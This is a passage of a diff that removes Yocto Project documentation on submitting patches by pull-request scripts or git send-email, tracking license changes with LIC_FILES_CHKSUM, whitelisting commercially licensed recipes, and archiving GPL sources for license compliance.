-                            <emphasis>Make Your Changes Locally:</emphasis>
-                            Make your changes in your local Git repository.
-                            You should make small, controlled, isolated changes.
-                            Keeping changes small and isolated aids review,
-                            makes merging/rebasing easier and keeps the change
-                            history clean should anyone need to refer to it in
-                            future.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Stage Your Changes:</emphasis>
-                            Stage your changes by using the <filename>git add</filename>
-                            command on each file you changed.
-                            </para></listitem>
-                        <listitem><para id='making-sure-you-have-correct-commit-information'>
-                            <emphasis>Commit Your Changes:</emphasis>
-                            Commit the change by using the
-                            <filename>git commit</filename> command.
-                            Make sure your commit information follows standards by
-                            following these accepted conventions:
-                            <itemizedlist>
-                                <listitem><para>
-                                    Be sure to include a "Signed-off-by:" line in the
-                                    same style as required by the Linux kernel.
-                                    Adding this line signifies that you, the submitter,
-                                    have agreed to the Developer's Certificate of
-                                    Origin 1.1 as follows:
-                                    <literallayout class='monospaced'>
-     Developer's Certificate of Origin 1.1
-
-     By making a contribution to this project, I certify that:
-
-     (a) The contribution was created in whole or in part by me and I
-         have the right to submit it under the open source license
-         indicated in the file; or
-
-     (b) The contribution is based upon previous work that, to the best
-         of my knowledge, is covered under an appropriate open source
-         license and I have the right under that license to submit that
-         work with modifications, whether created in whole or in part
-         by me, under the same open source license (unless I am
-         permitted to submit under a different license), as indicated
-         in the file; or
-
-     (c) The contribution was provided directly to me by some other
-         person who certified (a), (b) or (c) and I have not modified
-         it.
-
-     (d) I understand and agree that this project and the contribution
-         are public and that a record of the contribution (including all
-         personal information I submit with it, including my sign-off) is
-         maintained indefinitely and may be redistributed consistent with
-         this project or the open source license(s) involved.
-                                    </literallayout>
-                                    </para></listitem>
-                                <listitem><para>
-                                    Provide a single-line summary of the change.
-                                    and,
-                                    if more explanation is needed, provide more
-                                    detail in the body of the commit.
-                                    This summary is typically viewable in the
-                                    "shortlist" of changes.
-                                    Thus, providing something short and descriptive
-                                    that gives the reader a summary of the change is
-                                    useful when viewing a list of many commits.
-                                    You should prefix this short description with the
-                                    recipe name (if changing a recipe), or else with
-                                    the short form path to the file being changed.
-                                    </para></listitem>
-                                <listitem><para>
-                                    For the body of the commit message, provide
-                                    detailed information that describes what you
-                                    changed, why you made the change, and the approach
-                                    you used.
-                                    It might also be helpful if you mention how you
-                                    tested the change.
-                                    Provide as much detail as you can in the body of
-                                    the commit message.
-                                    <note>
-                                        You do not need to provide a more detailed
-                                        explanation of a change if the change is
-                                        minor to the point of the single line
-                                        summary providing all the information.
-                                    </note>
-                                    </para></listitem>
-                                <listitem><para>
-                                    If the change addresses a specific bug or issue
-                                    that is associated with a bug-tracking ID,
-                                    include a reference to that ID in your detailed
-                                    description.
-                                    For example, the Yocto Project uses a specific
-                                    convention for bug references - any commit that
-                                    addresses a specific bug should use the following
-                                    form for the detailed description.
-                                    Be sure to use the actual bug-tracking ID from
-                                    Bugzilla for
-                                    <replaceable>bug-id</replaceable>:
-                                    <literallayout class='monospaced'>
-     Fixes [YOCTO #<replaceable>bug-id</replaceable>]
-
-     <replaceable>detailed description of change</replaceable>
-                                    </literallayout>
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Push Your Commits to a "Contrib" Upstream:</emphasis>
-                            If you have arranged for permissions to push to an
-                            upstream contrib repository, push the change to that
-                            repository:
-                            <literallayout class='monospaced'>
-     $ git push <replaceable>upstream_remote_repo</replaceable> <replaceable>local_branch_name</replaceable>
-                            </literallayout>
-                            For example, suppose you have permissions to push into the
-                            upstream <filename>meta-intel-contrib</filename>
-                            repository and you are working in a local branch named
-                            <replaceable>your_name</replaceable><filename>/README</filename>.
-                            The following command pushes your local commits to the
-                            <filename>meta-intel-contrib</filename> upstream
-                            repository and puts the commit in a branch named
-                            <replaceable>your_name</replaceable><filename>/README</filename>:
-                            <literallayout class='monospaced'>
-     $ git push meta-intel-contrib <replaceable>your_name</replaceable>/README
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para id='push-determine-who-to-notify'>
-                            <emphasis>Determine Who to Notify:</emphasis>
-                            Determine the maintainer or the mailing list
-                            that you need to notify for the change.</para>
-
-                            <para>Before submitting any change, you need to be sure
-                            who the maintainer is or what mailing list that you need
-                            to notify.
-                            Use either these methods to find out:
-                            <itemizedlist>
-                                <listitem><para>
-                                    <emphasis>Maintenance File:</emphasis>
-                                    Examine the <filename>maintainers.inc</filename>
-                                    file, which is located in the
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                                    at
-                                    <filename>meta/conf/distro/include</filename>,
-                                    to see who is responsible for code.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <emphasis>Search by File:</emphasis>
-                                    Using <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>,
-                                    you can enter the following command to bring up a
-                                    short list of all commits against a specific file:
-                                    <literallayout class='monospaced'>
-     git shortlog -- <replaceable>filename</replaceable>
-                                    </literallayout>
-                                    Just provide the name of the file for which you
-                                    are interested.
-                                    The information returned is not ordered by history
-                                    but does include a list of everyone who has
-                                    committed grouped by name.
-                                    From the list, you can see who is responsible for
-                                    the bulk of the changes against the file.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <emphasis>Examine the List of Mailing Lists:</emphasis>
-                                    For a list of the Yocto Project and related mailing
-                                    lists, see the
-                                    "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing lists</ulink>"
-                                    section in the Yocto Project Reference Manual.
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Make a Pull Request:</emphasis>
-                            Notify the maintainer or the mailing list that you have
-                            pushed a change by making a pull request.</para>
-
-                            <para>The Yocto Project provides two scripts that
-                            conveniently let you generate and send pull requests to the
-                            Yocto Project.
-                            These scripts are <filename>create-pull-request</filename>
-                            and <filename>send-pull-request</filename>.
-                            You can find these scripts in the
-                            <filename>scripts</filename> directory within the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                            (e.g. <filename>~/poky/scripts</filename>).
-                            </para>
-
-                            <para>Using these scripts correctly formats the requests
-                            without introducing any whitespace or HTML formatting.
-                            The maintainer that receives your patches either directly
-                            or through the mailing list needs to be able to save and
-                            apply them directly from your emails.
-                            Using these scripts is the preferred method for sending
-                            patches.</para>
-
-                            <para>First, create the pull request.
-                            For example, the following command runs the script,
-                            specifies the upstream repository in the contrib directory
-                            into which you pushed the change, and provides a subject
-                            line in the created patch files:
-                            <literallayout class='monospaced'>
-     $ ~/poky/scripts/create-pull-request -u meta-intel-contrib -s "Updated Manual Section Reference in README"
-                            </literallayout>
-                            Running this script forms
-                            <filename>*.patch</filename> files in a folder named
-                            <filename>pull-</filename><replaceable>PID</replaceable>
-                            in the current directory.
-                            One of the patch files is a cover letter.</para>
-
-                            <para>Before running the
-                            <filename>send-pull-request</filename> script, you must
-                            edit the cover letter patch to insert information about
-                            your change.
-                            After editing the cover letter, send the pull request.
-                            For example, the following command runs the script and
-                            specifies the patch directory and email address.
-                            In this example, the email address is a mailing list:
-                            <literallayout class='monospaced'>
-     $ ~/poky/scripts/send-pull-request -p ~/meta-intel/pull-10565 -t meta-intel@yoctoproject.org
-                            </literallayout>
-                            You need to follow the prompts as the script is
-                            interactive.
-                            <note>
-                                For help on using these scripts, simply provide the
-                                <filename>-h</filename> argument as follows:
-                                <literallayout class='monospaced'>
-     $ poky/scripts/create-pull-request -h
-     $ poky/scripts/send-pull-request -h
-                                </literallayout>
-                            </note>
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-            </section>
-
-            <section id='submitting-a-patch'>
-                <title>Using Email to Submit a Patch</title>
-
-                <para>
-                    You can submit patches without using the
-                    <filename>create-pull-request</filename> and
-                    <filename>send-pull-request</filename> scripts described in the
-                    previous section.
-                    However, keep in mind, the preferred method is to use the scripts.
-                </para>
-
-                <para>
-                    Depending on the components changed, you need to submit the email
-                    to a specific mailing list.
-                    For some guidance on which mailing list to use, see the
-                    <link linkend='figuring-out-the-mailing-list-to-use'>list</link>
-                    at the beginning of this section.
-                    For a description of all the available mailing lists, see the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing Lists</ulink>"
-                    section in the Yocto Project Reference Manual.
-                </para>
-
-                <para>
-                    Here is the general procedure on how to submit a patch through
-                    email without using the scripts:
-                    <orderedlist>
-                        <listitem><para>
-                            <emphasis>Make Your Changes Locally:</emphasis>
-                            Make your changes in your local Git repository.
-                            You should make small, controlled, isolated changes.
-                            Keeping changes small and isolated aids review,
-                            makes merging/rebasing easier and keeps the change
-                            history clean should anyone need to refer to it in
-                            future.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Stage Your Changes:</emphasis>
-                            Stage your changes by using the <filename>git add</filename>
-                            command on each file you changed.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Commit Your Changes:</emphasis>
-                            Commit the change by using the
-                            <filename>git commit --signoff</filename> command.
-                            Using the <filename>--signoff</filename> option identifies
-                            you as the person making the change and also satisfies
-                            the Developer's Certificate of Origin (DCO) shown earlier.
-                            </para>
-
-                            <para>When you form a commit, you must follow certain
-                            standards established by the Yocto Project development
-                            team.
-                            See
-                            <link linkend='making-sure-you-have-correct-commit-information'>Step 3</link>
-                            in the previous section for information on how to
-                            provide commit information that meets Yocto Project
-                            commit message standards.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Format the Commit:</emphasis>
-                            Format the commit into an email message.
-                            To format commits, use the
-                            <filename>git format-patch</filename> command.
-                            When you provide the command, you must include a revision
-                            list or a number of patches as part of the command.
-                            For example, either of these two commands takes your most
-                            recent single commit and formats it as an email message in
-                            the current directory:
-                            <literallayout class='monospaced'>
-     $ git format-patch -1
-                            </literallayout>
-                            or
-                            <literallayout class='monospaced'>
-     $ git format-patch HEAD~
-                            </literallayout></para>
-
-                            <para>After the command is run, the current directory
-                            contains a numbered <filename>.patch</filename> file for
-                            the commit.</para>
-
-                            <para>If you provide several commits as part of the
-                            command, the <filename>git format-patch</filename> command
-                            produces a series of numbered files in the current
-                            directory – one for each commit.
-                            If you have more than one patch, you should also use the
-                            <filename>--cover</filename> option with the command,
-                            which generates a cover letter as the first "patch" in
-                            the series.
-                            You can then edit the cover letter to provide a
-                            description for the series of patches.
-                            For information on the
-                            <filename>git format-patch</filename> command,
-                            see <filename>GIT_FORMAT_PATCH(1)</filename> displayed
-                            using the <filename>man git-format-patch</filename>
-                            command.
-                            <note>
-                                If you are or will be a frequent contributor to the
-                                Yocto Project or to OpenEmbedded, you might consider
-                                requesting a contrib area and the necessary associated
-                                rights.
-                            </note>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Import the Files Into Your Mail Client:</emphasis>
-                            Import the files into your mail client by using the
-                            <filename>git send-email</filename> command.
-                            <note>
-                                In order to use <filename>git send-email</filename>,
-                                you must have the proper Git packages installed on
-                                your host.
-                                For Ubuntu, Debian, and Fedora the package is
-                                <filename>git-email</filename>.
-                            </note></para>
-
-                            <para>The <filename>git send-email</filename> command
-                            sends email by using a local or remote Mail Transport Agent
-                            (MTA) such as <filename>msmtp</filename>,
-                            <filename>sendmail</filename>, or through a direct
-                            <filename>smtp</filename> configuration in your Git
-                            <filename>~/.gitconfig</filename> file.
-                            If you are submitting patches through email only, it is
-                            very important that you submit them without any whitespace
-                            or HTML formatting that either you or your mailer
-                            introduces.
-                            The maintainer that receives your patches needs to be able
-                            to save and apply them directly from your emails.
-                            A good way to verify that what you are sending will be
-                            applicable by the maintainer is to do a dry run and send
-                            them to yourself and then save and apply them as the
-                            maintainer would.</para>
-
-                            <para>The <filename>git send-email</filename> command is
-                            the preferred method for sending your patches using
-                            email since there is no risk of compromising whitespace
-                            in the body of the message, which can occur when you use
-                            your own mail client.
-                            The command also has several options that let you
-                            specify recipients and perform further editing of the
-                            email message.
-                            For information on how to use the
-                            <filename>git send-email</filename> command,
-                            see <filename>GIT-SEND-EMAIL(1)</filename> displayed using
-                            the <filename>man git-send-email</filename> command.
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-            </section>
-        </section>
-    </section>
-
-    <section id='working-with-licenses'>
-        <title>Working With Licenses</title>
-
-        <para>
-            As mentioned in the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#licensing'>Licensing</ulink>"
-            section in the Yocto Project Overview and Concepts Manual,
-            open source projects are open to the public and they
-            consequently have different licensing structures in place.
-            This section describes the mechanism by which the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-            tracks changes to licensing text and covers how to maintain open
-            source license compliance during your project's lifecycle.
-            The section also describes how to enable commercially licensed
-            recipes, which by default are disabled.
-        </para>
-
-        <section id="usingpoky-configuring-LIC_FILES_CHKSUM">
-            <title>Tracking License Changes</title>
-
-            <para>
-                The license of an upstream project might change in the future.
-                In order to prevent these changes going unnoticed, the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
-                variable tracks changes to the license text. The checksums are
-                validated at the end of the configure step, and if the
-                checksums do not match, the build will fail.
-            </para>
-
-            <section id="usingpoky-specifying-LIC_FILES_CHKSUM">
-                <title>Specifying the <filename>LIC_FILES_CHKSUM</filename> Variable</title>
-
-                <para>
-                    The <filename>LIC_FILES_CHKSUM</filename>
-                    variable contains checksums of the license text in the
-                    source code for the recipe.
-                    Following is an example of how to specify
-                    <filename>LIC_FILES_CHKSUM</filename>:
-                    <literallayout class='monospaced'>
-     LIC_FILES_CHKSUM = "file://COPYING;md5=xxxx \
-                         file://licfile1.txt;beginline=5;endline=29;md5=yyyy \
-                         file://licfile2.txt;endline=50;md5=zzzz \
-                         ..."
-                    </literallayout>
-                    <note><title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                When using "beginline" and "endline", realize
-                                that line numbering begins with one and not
-                                zero.
-                                Also, the included lines are inclusive (i.e.
-                                lines five through and including 29 in the
-                                previous example for
-                                <filename>licfile1.txt</filename>).
-                                </para></listitem>
-                            <listitem><para>
-                                When a license check fails, the selected license
-                                text is included as part of the QA message.
-                                Using this output, you can determine the exact
-                                start and finish for the needed license text.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-
-                <para>
-                    The build system uses the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
-                    variable as the default directory when searching files
-                    listed in <filename>LIC_FILES_CHKSUM</filename>.
-                    The previous example employs the default directory.
-                </para>
-
-                <para>
-                    Consider this next example:
-                    <literallayout class='monospaced'>
-     LIC_FILES_CHKSUM = "file://src/ls.c;beginline=5;endline=16;\
-                                         md5=bb14ed3c4cda583abc85401304b5cd4e"
-     LIC_FILES_CHKSUM = "file://${WORKDIR}/license.html;md5=5c94767cedb5d6987c902ac850ded2c6"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The first line locates a file in
-                    <filename>${S}/src/ls.c</filename> and isolates lines five
-                    through 16 as license text.
-                    The second line refers to a file in
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.
-                </para>
-
-                <para>
-                    Note that <filename>LIC_FILES_CHKSUM</filename> variable is
-                    mandatory for all recipes, unless the
-                    <filename>LICENSE</filename> variable is set to "CLOSED".
-                </para>
-            </section>
-
-            <section id="usingpoky-LIC_FILES_CHKSUM-explanation-of-syntax">
-                <title>Explanation of Syntax</title>
-
-                <para>
-                    As mentioned in the previous section, the
-                    <filename>LIC_FILES_CHKSUM</filename> variable lists all
-                    the important files that contain the license text for the
-                    source code.
-                    It is possible to specify a checksum for an entire file,
-                    or a specific section of a file (specified by beginning and
-                    ending line numbers with the "beginline" and "endline"
-                    parameters, respectively).
-                    The latter is useful for source files with a license
-                    notice header, README documents, and so forth.
-                    If you do not use the "beginline" parameter, then it is
-                    assumed that the text begins on the first line of the file.
-                    Similarly, if you do not use the "endline" parameter,
-                    it is assumed that the license text ends with the last
-                    line of the file.
-                </para>
-
-                <para>
-                    The "md5" parameter stores the md5 checksum of the license
-                    text.
-                    If the license text changes in any way as compared to
-                    this parameter then a mismatch occurs.
-                    This mismatch triggers a build failure and notifies
-                    the developer.
-                    Notification allows the developer to review and address
-                    the license text changes.
-                    Also note that if a mismatch occurs during the build,
-                    the correct md5 checksum is placed in the build log and
-                    can be easily copied to the recipe.
-                </para>
-
-                <para>
-                    There is no limit to how many files you can specify using
-                    the <filename>LIC_FILES_CHKSUM</filename> variable.
-                    Generally, however, every project requires a few
-                    specifications for license tracking.
-                    Many projects have a "COPYING" file that stores the
-                    license information for all the source code files.
-                    This practice allows you to just track the "COPYING"
-                    file as long as it is kept up to date.
-                    <note><title>Tips</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                If you specify an empty or invalid "md5"
-                                parameter,
-                                <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-                                returns an md5 mis-match
-                                error and displays the correct "md5" parameter
-                                value during the build.
-                                The correct parameter is also captured in
-                                the build log.
-                                </para></listitem>
-                            <listitem><para>
-                                If the whole file contains only license text,
-                                you do not need to use the "beginline" and
-                               "endline" parameters.
-                               </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-            </section>
-        </section>
-
-        <section id="enabling-commercially-licensed-recipes">
-            <title>Enabling Commercially Licensed Recipes</title>
-
-            <para>
-                By default, the OpenEmbedded build system disables
-                components that have commercial or other special licensing
-                requirements.
-                Such requirements are defined on a
-                recipe-by-recipe basis through the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS'><filename>LICENSE_FLAGS</filename></ulink>
-                variable definition in the affected recipe.
-                For instance, the
-                <filename>poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly</filename>
-                recipe contains the following statement:
-                <literallayout class='monospaced'>
-     LICENSE_FLAGS = "commercial"
-                </literallayout>
-                Here is a slightly more complicated example that contains both
-                an explicit recipe name and version (after variable expansion):
-                <literallayout class='monospaced'>
-     LICENSE_FLAGS = "license_${PN}_${PV}"
-                </literallayout>
-	            In order for a component restricted by a
-                <filename>LICENSE_FLAGS</filename> definition to be enabled and
-                included in an image, it needs to have a matching entry in the
-                global
-	            <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS_WHITELIST'><filename>LICENSE_FLAGS_WHITELIST</filename></ulink>
-                variable, which is a variable typically defined in your
-                <filename>local.conf</filename> file.
-                For example, to enable the
-                <filename>poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly</filename>
-	            package, you could add either the string
-	            "commercial_gst-plugins-ugly" or the more general string
-	            "commercial" to <filename>LICENSE_FLAGS_WHITELIST</filename>.
-                See the
-                "<link linkend='license-flag-matching'>License Flag Matching</link>"
-                section for a full
-                explanation of how <filename>LICENSE_FLAGS</filename> matching
-                works.
-                Here is the example:
-                <literallayout class='monospaced'>
-     LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly"
-                </literallayout>
-	            Likewise, to additionally enable the package built from the
-                recipe containing
-	            <filename>LICENSE_FLAGS = "license_${PN}_${PV}"</filename>,
-                and assuming that the actual recipe name was
-                <filename>emgd_1.10.bb</filename>, the following string would
-                enable that package as well as the original
-                <filename>gst-plugins-ugly</filename> package:
-                <literallayout class='monospaced'>
-     LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly license_emgd_1.10"
-                </literallayout>
-	            As a convenience, you do not need to specify the complete
-                license string in the whitelist for every package.
-                You can use an abbreviated form, which consists
-                of just the first portion or portions of the license
-                string before the initial underscore character or characters.
-                A partial string will match any license that contains the
-                given string as the first portion of its license.
-                For example, the following whitelist string will also match
-                both of the packages previously mentioned as well as any other
-                packages that have licenses starting with "commercial" or
-                "license".
-                <literallayout class='monospaced'>
-     LICENSE_FLAGS_WHITELIST = "commercial license"
-                </literallayout>
-            </para>
-
-            <section id="license-flag-matching">
-                <title>License Flag Matching</title>
-
-                <para>
-		            License flag matching allows you to control what recipes
-                    the OpenEmbedded build system includes in the build.
-                    Fundamentally, the build system attempts to match
-                    <filename>LICENSE_FLAGS</filename> strings found in recipes
-                    against <filename>LICENSE_FLAGS_WHITELIST</filename>
-                    strings found in the whitelist.
-                    A match causes the build system to include a recipe in the
-                    build, while failure to find a match causes the build
-                    system to exclude a recipe.
-                </para>
-
-                <para>
-                    In general, license flag matching is simple.
-                    However, understanding some concepts will help you
-                    correctly and effectively use matching.
-                </para>
-
-                <para>
-                    Before a flag
-                    defined by a particular recipe is tested against the
-                    contents of the whitelist, the expanded string
-                    <filename>_${PN}</filename> is appended to the flag.
-                    This expansion makes each
-                    <filename>LICENSE_FLAGS</filename> value recipe-specific.
-                    After expansion, the string is then matched against the
-                    whitelist.
-                    Thus, specifying
-                    <filename>LICENSE_FLAGS = "commercial"</filename>
-                    in recipe "foo", for example, results in the string
-                    <filename>"commercial_foo"</filename>.
-                    And, to create a match, that string must appear in the
-                    whitelist.
-                </para>
-
-                <para>
-                    Judicious use of the <filename>LICENSE_FLAGS</filename>
-                    strings and the contents of the
-                    <filename>LICENSE_FLAGS_WHITELIST</filename> variable
-                    allows you a lot of flexibility for including or excluding
-                    recipes based on licensing.
-                    For example, you can broaden the matching capabilities by
-                    using license flags string subsets in the whitelist.
-                    <note>
-                        When using a string subset, be sure to use the part of
-                        the expanded string that precedes the appended
-                        underscore character (e.g.
-                        <filename>usethispart_1.3</filename>,
-                        <filename>usethispart_1.4</filename>, and so forth).
-                    </note>
-                    For example, simply specifying the string "commercial" in
-                    the whitelist matches any expanded
-                    <filename>LICENSE_FLAGS</filename> definition that starts
-                    with the string "commercial" such as "commercial_foo" and
-                    "commercial_bar", which are the strings the build system
-                    automatically generates for hypothetical recipes named
-                    "foo" and "bar" assuming those recipes simply specify the
-                    following:
-                    <literallayout class='monospaced'>
-     LICENSE_FLAGS = "commercial"
-                    </literallayout>
-                    Thus, you can choose to exhaustively
-                    enumerate each license flag in the whitelist and
-                    allow only specific recipes into the image, or
-                    you can use a string subset that causes a broader range of
-                    matches to allow a range of recipes into the image.
-                </para>
-
-                <para>
-                    This scheme works even if the
-                    <filename>LICENSE_FLAGS</filename> string already
-                    has <filename>_${PN}</filename> appended.
-                    For example, the build system turns the license flag
-                    "commercial_1.2_foo" into "commercial_1.2_foo_foo" and
-                    would match both the general "commercial" and the specific
-                    "commercial_1.2_foo" strings found in the whitelist, as
-                    expected.
-                </para>
-
-                <para>
-                    Here are some other scenarios:
-                    <itemizedlist>
-                        <listitem><para>
-                            You can specify a versioned string in the recipe
-                            such as "commercial_foo_1.2" in a "foo" recipe.
-                            The build system expands this string to
-                            "commercial_foo_1.2_foo".
-                            Combine this license flag with a whitelist that has
-                            the string "commercial" and you match the flag
-                            along with any other flag that starts with the
-                            string "commercial".
-                            </para></listitem>
-                        <listitem><para>
-                            Under the same circumstances, you can use
-                            "commercial_foo" in the whitelist and the build
-                            system not only matches "commercial_foo_1.2" but
-                            also matches any license flag with the string
-                            "commercial_foo", regardless of the version.
-                            </para></listitem>
-                        <listitem><para>
-                            You can be very specific and use both the
-                            package and version parts in the whitelist (e.g.
-                            "commercial_foo_1.2") to specifically match a
-                            versioned recipe.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id="other-variables-related-to-commercial-licenses">
-                <title>Other Variables Related to Commercial Licenses</title>
-
-                <para>
-                    Other helpful variables related to commercial
-                    license handling exist and are defined in the
-                    <filename>poky/meta/conf/distro/include/default-distrovars.inc</filename> file:
-                    <literallayout class='monospaced'>
-     COMMERCIAL_AUDIO_PLUGINS ?= ""
-     COMMERCIAL_VIDEO_PLUGINS ?= ""
-                    </literallayout>
-                    If you want to enable these components, you can do so by
-                    making sure you have statements similar to the following
-                    in your <filename>local.conf</filename> configuration file:
-                    <literallayout class='monospaced'>
-     COMMERCIAL_AUDIO_PLUGINS = "gst-plugins-ugly-mad \
-        gst-plugins-ugly-mpegaudioparse"
-     COMMERCIAL_VIDEO_PLUGINS = "gst-plugins-ugly-mpeg2dec \
-        gst-plugins-ugly-mpegstream gst-plugins-bad-mpegvideoparse"
-     LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly commercial_gst-plugins-bad commercial_qmmp"
-                    </literallayout>
-                    Of course, you could also create a matching whitelist
-                    for those components using the more general "commercial"
-                    in the whitelist, but that would also enable all the
-                    other packages with <filename>LICENSE_FLAGS</filename>
-                    containing "commercial", which you may or may not want:
-                    <literallayout class='monospaced'>
-     LICENSE_FLAGS_WHITELIST = "commercial"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Specifying audio and video plugins as part of the
-                    <filename>COMMERCIAL_AUDIO_PLUGINS</filename> and
-                    <filename>COMMERCIAL_VIDEO_PLUGINS</filename> statements
-                    (along with the enabling
-                    <filename>LICENSE_FLAGS_WHITELIST</filename>) includes the
-                    plugins or components into built images, thus adding
-                    support for media formats or components.
-                </para>
-            </section>
-        </section>
-
-        <section id='maintaining-open-source-license-compliance-during-your-products-lifecycle'>
-            <title>Maintaining Open Source License Compliance During Your Product's Lifecycle</title>
-
-            <para>
-                One of the concerns for a development organization using open source
-                software is how to maintain compliance with various open source
-                licensing during the lifecycle of the product.
-                While this section does not provide legal advice or
-                comprehensively cover all scenarios, it does
-                present methods that you can use to
-                assist you in meeting the compliance requirements during a software
-                release.
-            </para>
-
-            <para>
-                With hundreds of different open source licenses that the Yocto
-                Project tracks, it is difficult to know the requirements of each
-                and every license.
-                However, the requirements of the major FLOSS licenses can begin
-                to be covered by
-                assuming that three main areas of concern exist:
-                <itemizedlist>
-                    <listitem><para>Source code must be provided.</para></listitem>
-                    <listitem><para>License text for the software must be
-                        provided.</para></listitem>
-                    <listitem><para>Compilation scripts and modifications to the
-                        source code must be provided.
-                        </para></listitem>
-                </itemizedlist>
-                There are other requirements beyond the scope of these
-                three and the methods described in this section
-                (e.g. the mechanism through which source code is distributed).
-            </para>
-
-            <para>
-                As different organizations have different methods of complying with
-                open source licensing, this section is not meant to imply that
-                there is only one single way to meet your compliance obligations,
-                but rather to describe one method of achieving compliance.
-                The remainder of this section describes methods supported to meet the
-                previously mentioned three requirements.
-                Once you take steps to meet these requirements,
-                and prior to releasing images, sources, and the build system,
-                you should audit all artifacts to ensure completeness.
-                <note>
-                    The Yocto Project generates a license manifest during
-                    image creation that is located
-                    in <filename>${DEPLOY_DIR}/licenses/<replaceable>image_name-datestamp</replaceable></filename>
-                    to assist with any audits.
-                </note>
-            </para>
-
-            <section id='providing-the-source-code'>
-                <title>Providing the Source Code</title>
-
-                <para>
-                    Compliance activities should begin before you generate the
-                    final image.
-                    The first thing you should look at is the requirement that
-                    tops the list for most compliance groups - providing
-                    the source.
-                    The Yocto Project has a few ways of meeting this
-                    requirement.
-                </para>
-
-                <para>
-                    One of the easiest ways to meet this requirement is
-                    to provide the entire
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
-                    used by the build.
-                    This method, however, has a few issues.
-                    The most obvious is the size of the directory since it includes
-                    all sources used in the build and not just the source used in
-                    the released image.
-                    It will include toolchain source, and other artifacts, which
-                    you would not generally release.
-                    However, the more serious issue for most companies is accidental
-                    release of proprietary software.
-                    The Yocto Project provides an
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-archiver'><filename>archiver</filename></ulink>
-                    class to help avoid some of these concerns.
-                </para>
-
-                <para>
-                    Before you employ <filename>DL_DIR</filename> or the
-                    <filename>archiver</filename> class, you need to decide how
-                    you choose to provide source.
-                    The source <filename>archiver</filename> class can generate
-                    tarballs and SRPMs and can create them with various levels of
-                    compliance in mind.
-                </para>
-
-                <para>
-                    One way of doing this (but certainly not the only way) is to
-                    release just the source as a tarball.
-                    You can do this by adding the following to the
-                    <filename>local.conf</filename> file found in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-                    <literallayout class='monospaced'>
-     INHERIT += "archiver"
-     ARCHIVER_MODE[src] = "original"
-                    </literallayout>
-                    During the creation of your image, the source from all
-                    recipes that deploy packages to the image is placed within
-                    subdirectories of
-                    <filename>DEPLOY_DIR/sources</filename> based on the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
-                    for each recipe.
-                    Releasing the entire directory enables you to comply with
-                    requirements concerning providing the unmodified source.
-                    It is important to note that the size of the directory can
-                    get large.
-                </para>
-
-                <para>
-                    A way to help mitigate the size issue is to only release
-                    tarballs for licenses that require the release of
-                    source.
-                    Let us assume you are only concerned with GPL code as
-                    identified by running the following script:
-                    <literallayout class='monospaced'>
-     # Script to archive a subset of packages matching specific license(s)
-     # Source and license files are copied into sub folders of package folder
-     # Must be run from build folder
-     #!/bin/bash
-     src_release_dir="source-release"
-     mkdir -p $src_release_dir
-     for a in tmp/deploy/sources/*; do
-        for d in $a/*; do
-           # Get package name from path
-           p=`basename $d`
-           p=${p%-*}
-           p=${p%-*}
-           # Only archive GPL packages (update *GPL* regex for your license check)
-           numfiles=`ls tmp/deploy/licenses/$p/*GPL* 2> /dev/null | wc -l`
-           if [ $numfiles -gt 1 ]; then
-              echo Archiving $p
-              mkdir -p $src_release_dir/$p/source
-              cp $d/* $src_release_dir/$p/source 2> /dev/null
-              mkdir -p $src_release_dir/$p/license
-              cp tmp/deploy/licenses/$p/* $src_release_dir/$p/license 2> /dev/null
-           fi
-        done
-     done
-                    </literallayout>
-                    At this point, you could create a tarball from the
-                    <filename>gpl_source_release</filename> directory and
-                    provide that to the end user.
-                    This method would be a step toward achieving compliance
-                    with section 3a of GPLv2 and with section 6 of GPLv3.
